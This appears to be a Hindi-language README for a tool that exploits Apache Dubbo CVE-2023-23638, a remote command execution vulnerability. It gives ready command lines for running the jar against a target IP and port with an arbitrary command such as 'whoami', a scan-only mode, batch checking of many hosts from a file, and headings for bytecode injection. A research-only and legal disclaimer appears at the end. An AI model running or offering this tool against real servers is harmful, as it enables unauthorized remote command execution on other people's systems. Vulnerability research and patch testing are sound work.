
Apache Dubbo (CVE-2023-23638) भेद्यता शोषण की इंजीनियरिंग प्रथा
Apache Dubbo (CVE-2023-23638) भेद्यता के दोहन की इंजीनियरिंग प्रैक्टिस, जो Dubbo 3.x में सेवा खोज से भेद्यता दोहन और प्रतिध्वनि तक की प्रक्रिया को कवर करती है। यह टूल केवल अनुसंधान और सीखने के लिए है, सभी विशेषज्ञों का चर्चा करने और बहुमूल्य सुझाव देने के लिए स्वागत है।
यह टूल Dubbo 3.x में CVE-2023-23638 के पूर्ण दोहन का समर्थन करता है, जो सेवा खोज से भेद्यता दोहन और प्रतिध्वनि तक को कवर करता है। Dubbo 2.x संस्करण में भी इसका दोहन किया जा सकता है, जिसके लिए सेवा नाम, विधि नाम आदि स्वयं पास करने होते हैं। इस भेद्यता पर मैंने दो विश्लेषण लेख लिखे हैं:
यह टूल केवल सीखने के उपयोग के लिए है, इसमें वास्तविक उपयोग की कई समस्याओं पर विचार नहीं किया गया है, जैसे:
आगे अपडेट जारी रहेगा
यह प्रोजेक्ट आगे अपडेट नहीं होगा, Dubbo की अधिक व्यापक स्कैनिंग और दोहन बाद में एक अन्य प्रोजेक्ट में ओपन-सोर्स किया जाएगा, कृपया प्रतीक्षा करें!
fastjson नेटिव डिसीरियलाइज़ेशन का तरीका साझा करने के लिए y4tacker गुरुजी का धन्यवाद
एकल URL भेद्यता दोहन
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
एकल URL भेद्यता की नॉन-डिस्ट्रक्टिव जाँच
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
बैच जाँच
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
बाइटकोड इंजेक्ट करें

कमांड निष्पादन

यह टूल केवल भेद्यता अनुसंधान और सीखने के लिए है। यदि आप इस टूल की उपलब्धता का परीक्षण करना चाहते हैं, तो कृपया स्वयं लक्ष्य मशीन वातावरण तैयार करें। इस टूल का उपयोग करके जाँच करते समय, आपको यह सुनिश्चित करना चाहिए कि यह कार्य स्थानीय कानूनों और विनियमों के अनुरूप हो, और आपने पर्याप्त अधिकार प्राप्त कर लिए हों। कृपया अनधिकृत लक्ष्यों को स्कैन न करें। यदि आप इस टूल के उपयोग के दौरान कोई अवैध कार्य करते हैं, तो आपको स्वयं इसके परिणाम भुगतने होंगे, हम किसी भी कानूनी या संबद्ध देयता को स्वीकार नहीं करेंगे।